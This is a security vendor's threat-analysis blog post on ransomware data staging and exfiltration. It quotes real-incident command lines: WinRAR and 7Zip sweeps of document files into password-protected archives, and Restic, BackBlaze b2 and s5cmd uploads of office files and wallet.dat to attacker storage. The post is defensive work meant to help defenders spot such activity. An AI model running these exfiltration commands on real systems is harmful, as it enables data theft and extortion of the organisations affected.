Don’t let overlooked obligations become incidents. Learn how.
Utility navigation bar redirect icon
Portal LoginSupportContact
Search
Close search
Huntress Logo in Teal
  • Platform Overview
    Managed EDR

    Get full endpoint visibility, detection, and response.

    Managed EDR

    Get full endpoint visibility, detection, and response.

    Managed ITDR

    Protect your Microsoft 365 identities and email environments.

    Managed ITDR

    Protect your Microsoft 365 identities and email environments.

    Managed SIEM

    Managed threat response and robust compliance support at a predictable price.

    Managed SIEM

    Managed threat response and robust compliance support at a predictable price.

    Managed Security Awareness Training

    Empower your teams with science-backed security awareness training.

    Managed Security Awareness Training

    Empower your teams with science-backed security awareness training.

    Managed ISPM

    Continuous Microsoft 365 and identity hardening, managed and enforced by Huntress experts.

    Managed ISPM

    Continuous Microsoft 365 and identity hardening, managed and enforced by Huntress experts.

    Managed ESPM

    Proactively secure endpoints against attacks.

    Managed ESPM

    Proactively secure endpoints against attacks.

    Integrations
    Integrations
    Support Documentation
    Support Documentation
    See Huntress in Action

    Quickly deploy and manage real-time protection for endpoints, email, and employees - all from a single dashboard.

    Huntress Cybersecurity
    See Huntress in Action

    Quickly deploy and manage real-time protection for endpoints, email, and employees - all from a single dashboard.

    Huntress Cybersecurity
  • Threats We Stop
    Phishing
    Phishing
    Business Email Compromise
    Business Email Compromise
    Ransomware
    Ransomware
    Infostealers
    Infostealers
    View Allright arrowView Allright arrow
    Industries We Serve
    Education
    Education
    Financial Services
    Financial Services
    State and Local Government
    State and Local Government
    Healthcare
    Healthcare
    Law Firms
    Law Firms
    Manufacturing
    Manufacturing
    Utilities
    Utilities
    View Allright arrowView Allright arrow
    Tailored Solutions
    MSPs
    MSPs
    Resellers
    Resellers
    SMBs
    SMBs
    Compliance
    Compliance
    What Gets Overlooked Gets Exploited

    Most days, nothing happens. But one day, something will.

    Huntress Cybersecurity
    Cybercriminals Have Evolved

    Get the intel on today’s cybercriminal groups and learn how to protect yourself.

    Huntress Cybersecurity
  • Pricing
  • Community Series
    The Product Lab

    Shape the next big thing in cybersecurity together.

    The Product Lab

    Shape the next big thing in cybersecurity together.

    Fireside Chat

    Real people. Real perspectives. Better conversations.

    Fireside Chat

    Real people. Real perspectives. Better conversations.

    Tradecraft Tuesday

    No products, no pitches – just tradecraft.

    Tradecraft Tuesday

    No products, no pitches – just tradecraft.

    _declassified

    Exposing hidden truths in the world of cybersecurity.

    _declassified

    Exposing hidden truths in the world of cybersecurity.

    Resources
    Upcoming Events
    Upcoming Events
    Ebooks
    Ebooks
    On-Demand Webinars
    On-Demand Webinars
    Videos
    Videos
    Whitepapers
    Whitepapers
    Datasheets
    Datasheets
    Cybersecurity Education
    Cybersecurity 101
    Cybersecurity 101
    Cybersecurity Guides
    Cybersecurity Guides
    Threat Library
    Threat Library
    Real Tradecraft, Real Results
    Real Tradecraft, Real Results
    2026 Cyber Threat Report
    2026 Cyber Threat Report
    The Huntress Blog
    Huntress Lands on the Microsoft Marketplace
    Huntress Cybersecurity
    Huntress Lands on the Microsoft Marketplace
    Huntress Cybersecurity
    How Huntress & DEFCERT Are Streamlining CMMC Assessment Prep
    Huntress Cybersecurity
    How Huntress & DEFCERT Are Streamlining CMMC Assessment Prep
    Huntress Cybersecurity
    Live Hacking Into Microsoft 365 with Kyle Hanslovan
    Huntress Cybersecurity
    Live Hacking Into Microsoft 365 with Kyle Hanslovan
    Huntress Cybersecurity
  • Why Huntress

    Go beyond AI in the fight against today’s hackers with Huntress Managed EDR purpose-built for your needs

    Huntress Cybersecurity
    Why Huntress

    Go beyond AI in the fight against today’s hackers with Huntress Managed EDR purpose-built for your needs

    Huntress Cybersecurity
    The Huntress SOC

    24/7 Security Operations Center

    The Huntress SOC

    24/7 Security Operations Center

    Reviews

    Why businesses of all sizes trust Huntress to defend their assets

    Reviews

    Why businesses of all sizes trust Huntress to defend their assets

    Case Studies

    Learn directly from our partners how Huntress has helped them

    Case Studies

    Learn directly from our partners how Huntress has helped them

    Community

    Get in touch with the Huntress Community team

    Community

    Get in touch with the Huntress Community team

    Compare Huntress
    Bitdefender
    Bitdefender
    Blackpoint
    Blackpoint
    Breach Secure Now!
    Breach Secure Now!
    Crowdstrike
    Crowdstrike
    Datto
    Datto
    SentinelOne
    SentinelOne
    Sophos
    Sophos
    Compare Allright arrowCompare Allright arrow
  • HUNTRESS HUB

    Login to access top-notch marketing resources, tools, and training.

    Huntress Cybersecurity
    HUNTRESS HUB

    Login to access top-notch marketing resources, tools, and training.

    Huntress Cybersecurity
    Partners
    MSPs

    Join our partner community to deliver expert-led managed security.

    MSPs

    Join our partner community to deliver expert-led managed security.

    Resellers

    Partner program designed to grow your cybersecurity business.

    Resellers

    Partner program designed to grow your cybersecurity business.

    Tech Alliances

    Driving innovation through global technology Partnerships

    Tech Alliances

    Driving innovation through global technology Partnerships

    Microsoft Partnership

    A Level-Up for Your Business Security

    Microsoft Partnership

    A Level-Up for Your Business Security

  • Press Release
    Huntress Announces Collaboration with Microsoft to Strengthen Cybersecurity for Businesses of All Sizes
    Huntress Cybersecurity
    Press Release
    Huntress Announces Collaboration with Microsoft to Strengthen Cybersecurity for Businesses of All Sizes
    Huntress Cybersecurity
    Our Story

    We're on a mission to shatter the barriers to enterprise-level security.

    Our Story

    We're on a mission to shatter the barriers to enterprise-level security.

    Newsroom

    Explore press releases, news articles, media interviews and more.

    Newsroom

    Explore press releases, news articles, media interviews and more.

    Meet the Team

    Founded by former NSA Cyber Operators. Backed by security researchers.

    Meet the Team

    Founded by former NSA Cyber Operators. Backed by security researchers.

    Careers

    Ready to shake up the cybersecurity world? Join the hunt.

    Careers

    Ready to shake up the cybersecurity world? Join the hunt.

    Awards
    Awards
    Contact Us
    Contact Us
  • Portal Login
  • Support
  • Contact
  • Search
  • Get a Demo
  • Start for Free
Portal LoginSupportContact
Search
Close search
Get a Demo
Start for Free
HomeBlog
Exposing Data Exfil: LOLBins, TTPs, and Binaries…Oh, My!
Published:
August 19, 2025

Exposing Data Exfil: LOLBins, TTPs, and Binaries…Oh, My!

By:
Harlan Carvey
Lindsey O'Donnell-Welch
Share icon
Glitch effectGlitch effectGlitch effect

Huntress frequently sees data staging and exfiltration activity, particularly with ransomware threat actors. These threat actors will collect, stage, and exfiltrate data prior to file encryption in order to engage in “double extortion” tactics. This means that if the impacted organization is not willing to pay the ransom to recover encrypted files, the threat actor will threaten to release the stolen data to further encourage payment. 

The purpose of this blog is to illustrate some examples of data staging and exfiltration activity observed by Huntress analysts rather than provide a comprehensive treatise of all possible actions that could be taken. As such, it’s possible that there are examples that do not appear in this blog; for example, copying data via the shared clipboard in a Remote Desktop Protocol (RDP) session, or the use of an FTP connection established via Windows Explorer. 

Our intention here is to bring awareness to the activity so it can be more easily understood. The hope is that this will help defenders determine more quickly whether certain events are legitimate or not. 



Figure 1: Different types of data staging and exfiltration techniques


Data staging: From archival tools to cloud storage sites

Very often, prior to data being exfiltrated out of an organization, it first has to be collected and staged. Threat actors often stage data through the use of archival tools; WinRAR and 7Zip are two such tools commonly observed across a wide range of incidents.

Not long ago, Huntress analysts observed the following 7Zip command line used to stage data, collecting it into an archive to be exfiltrated:

C:\Users\user\Downloads\7-ZipPortable\App\7-Zip64\7zG.exe a -i#7zMap19592:2148:7zEvent5339 -ad -saa -- "\\[REDACTED]\Data\Data”

This command line was then followed by the threat actor’s use of GoFile[.]io cloud storage. Huntress analysts have also observed the use of other cloud storage sites, such as MEGASync.

Other freely available tools, such as WinRAR, have also been observed being used by threat actors. Two observed command lines appear as follows:

WinRAR.exe  a -m5 -v3g -tn365d -n*.bmp -n*.doc -n*.docx -n*.xls -n*.xlsx -n*.pdf -n*.txt -hp[REDACTED] "C:\[REDACTED]\data.rar "C:\"

winrar.exe a -m0 -v3g -tn1000d -n*.txt -n*.pdf -n*.xls -n*.doc -n*.xlsx -n*.docx -hp[REDACTED] "C:\DATA\done\DATA.rar "C:\DATA"

Both of the above commands are used to “sweep up” a wide swath of files into an archive, ahead of exfiltrating the data. This activity is observed frequently enough that it’s often referred to as “...in preparation for data exfiltration…”, rather than explicitly “data staging”. 


Data exfiltration: LOLBins, backup utilities, and RClone

Data exfiltration can occur in a number of ways. For example, Huntress once observed a threat actor performing reconnaissance activities where they used the living-off-the-land binary (LOLBin) finger.exe to exfiltrate a process listing from an endpoint. Other native utilities, such as ftp.exe or bitsadmin.exe, have been used in a similar manner by threat actors to move data they’ve collected from the compromised endpoint to their own systems. 

As ransomware attacks roll out, there is often a focus by defenders on initial access or the noisier event of the ransomware deployment. However, data exfiltration is another important phase of incidents that can be difficult to detect. 

During several incidents, Huntress analysts have observed threat actors downloading and installing both WinRAR and FileZilla, ultimately exfiltrating staged data via fzsftp.exe, FileZilla’s SFTP module.

Other observed methods of data exfiltration include the use of RClone for syncing files to the cloud, or backup utilities such as Restic and BackBlaze. The following example command lines include Restic being observed during a BlackCat ransomware campaign, and BackBlaze (b2.exe) being observed during an INC ransomware incident, respectively:

restic.exe -r rest:http://[REDACTED]:8000/ --password-file ppp.txt --use-fs-snapshot --verbose backup \\[REDACTED]

\b2.exe  sync \\[REDACTED]\ b2://{REDACTED] --include-regex "(?i).*\.(doc|xls|xlsx|docx|pdf|csv)$|wallet\.dat$ --exclude-regex ".*" --keep-days 1826 --allow-empty-source --skip-hash-verification --exclude-all-symlinks --threads 30

Very often, tools for data staging are used in close combination with data exfiltration tools. During a recent incident, Huntress analysts observed the use of WinRAR for data staging, using a command such as the following: 

C:\Program Files\WinRAR\WinRAR.exe a -ep1  -scul -r0 -iext   -imon1 -- . D:\[REDACTED]...

The above command included an extensive list of folders to extract files from, and was followed shortly thereafter by the threat actor downloading, installing, and employing WinSCP. 


S5cmd for data exfiltration 

In a recent Qilin ransomware attack, Huntress observed threat actors using an open source tool named s5cmd. The use of s5cmd demonstrates that threat actors continue to find success in using freely available tools for data exfiltration to cloud resources. This tool is described on GitHub as “a high-performance command-line tool designed for interacting with S3-compatible object storage and local filesystems.” Reviewing the options available at the GitHub site, it appears to be a great option for copying files or “objects” from an endpoint to an S3 bucket.

In this attack, the threat actor accessed the infrastructure via an exposed (RDP) instance. They then used s5cmd.exe for data exfiltration before using PSExec to push the ransomware executable (svchosts.exe) and launch it on other endpoints. 


Figure 2: Breakdown of s5cmd features on GitHub page

While Huntress was deployed across 18 agents, the Windows Event Logs on one endpoint revealed significant details about the threat actor’s activity. For example, the Windows Defender Event Log contained a Microsoft-Windows-Windows Defender/5001 event, indicating that Windows Defender’s Real-Time Protection (RTP) functionality had been disabled. Shortly thereafter, there were a number of Microsoft-Windows-Windows Defender/5007 events indicating that additional Windows Defender functionality, such as SpyNetReporting, was also disabled. Prior to this activity, Windows Event Log messages included SecurityCenter/15;Windows Defender,SECURITY_PRODUCT_STATE_ON events; immediately following this activity, those messages changed to SecurityCenter/15;Windows Defender,SECURITY_PRODUCT_STATE_SNOOZED.

The threat actor ran the data exfiltration tool using the following command line:

s5cmd  --credentials-file credentials cp --include "*.pdf" --include "*.png" --include "*.jpg" --include "*.jpeg" --include "*.xls" --include "*.xlsx" --include "*.tif" --include "*.zip" --include "*.doc" --include "*.docx" "[Folder]" s3://[Resource]

This does not appear to be a one-off event—Huntress analysts observed a nearly identical s5cmd.exe command line during an incident that occurred five weeks prior to the incident described above.


Data exfiltration: Detection challenges

Huntress' 2025 Cyber Threat Report found that in ransomware attacks, attackers performed data exfiltration immediately prior to deploying the ransomware more than 70 percent of the time. 

Despite that fact, the process of actually detecting data exfiltration while it’s happening—outside of attackers explicitly telling victims in their ransom notes—can be difficult for defenders. Quickly and effectively detecting data staging and exfiltration often requires a detailed understanding of legitimate business processes, as otherwise, defenders run the risk of “crying wolf” due to a high rate of false positive detections.  


Most common activity prior to ransomware deployment
Figure 3: Data exfiltration is the most common activity prior to ransomware deployment

That’s because threat actors use techniques like copying data to a shared clipboard, or slip data through LOLBins like ftp.exe, finger.exe (for exfiltration), or bitsadmin.exe (for creating file upload jobs), which are often very similar to legitimate actions performed by system administrators. 

Defenders can keep tabs on behaviors linked to data staging and data exfiltration by monitoring for the specific activities outlined above, which are linked to various open-source tools, backup utilities, and more.




Categories
Threat Analysis
Summarize this postClose Speech Bubble
ChatGPTClaudePerplexityGoogle AI

Tune in to Tradecraft Tuesday

Join us every month for Tradecraft Tuesday, our live webinar where we expose hacker techniques and talk nerdy with live demos.
Secure your spot now.
Share
Facebook iconTwitter X iconLinkedin iconDownload icon
Glitch effect

You Might Also Like

  • Using Backup Utilities for Data Exfiltration

    “Double extortion” attacks, often perpetrated by ransomware threat actors, include data exfiltration prior to file encryption. Huntress analysts have observed various means of data exfiltration, but recently observed the use of a legitimate backup application seen by others to be associated with a Noberus/ALPHV ransomware affiliate.
  • Huntress Threat Advisory: Active Exploitation of SonicWall VPNs

    A likely zero-day vulnerability in SonicWall VPNs is being actively exploited to bypass MFA and deploy ransomware. Huntress advises disabling the VPN service immediately or severely restricting access via IP allow-listing. We're seeing threat actors pivot directly to domain controllers within hours of the initial breach.
  • Data Exfiltration and Threat Actor Infrastructure Exposed

    Threat actors are people, too, and like everyone else, make mistakes. These mistakes can reveal insights into the threat actor, or even expose access to their infrastructure.
  • It’s Not Safe to Pay SafePay

    Huntress has observed Akira ransomware affiliates in action, as well as ReadText34 and INC ransomware being deployed.
  • What are LOLBins? How to Detect These Shady Malicious Threats

    Learn what LOLBins are, threats malicious threat actors can pose, how to detect those threats, and how to prevent them.
  • Can’t Touch This: Data Exfiltration via Finger

    Threat actors frequently make use of native utilities during incidents. However, this blog post discusses a rarely-observed means of data exfiltration.
  • The Unwanted Guest

    Threat actors are enabling the built-in Windows Guest account to maintain persistence. Learn how they gain access and how to detect this activity.
  • Ransomware Canaries: A 2022 Update

    Read about the exciting new updates to our Ransomware Canaries service.

Sign Up for Huntress Updates

Get insider access to Huntress tradecraft, killer events, and the freshest blog updates.
Privacy • Terms
By submitting this form, you accept our Terms of Service & Privacy Policy
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
Huntress Managed Security PlatformManaged EDRManaged EDR for macOSManaged EDR for LinuxManaged ITDRManaged SIEMManaged Security Awareness TrainingManaged ISPMManaged ESPMBook a Demo
PhishingComplianceBusiness Email CompromiseEducationFinanceHealthcareManufacturingState & Local Government
Managed Service ProvidersResellersIT & Security Teams24/7 SOCCase Studies
BlogResource CenterCybersecurity 101Upcoming EventsSupport Documentation
Our CompanyLeadershipNews & PressCareersContact Us
Huntress white logo

Protecting 215k+ customers like you with enterprise-grade protection.

Privacy PolicyCookie PolicyTerms of UseCookie Consent
Linkedin iconTwitter X iconYouTube iconInstagram icon
© 2025 Huntress All Rights Reserved.

Join the Hunt

Get insider access to Huntress tradecraft, killer events, and the freshest blog updates.

By submitting this form, you accept our Terms of Service & Privacy Policy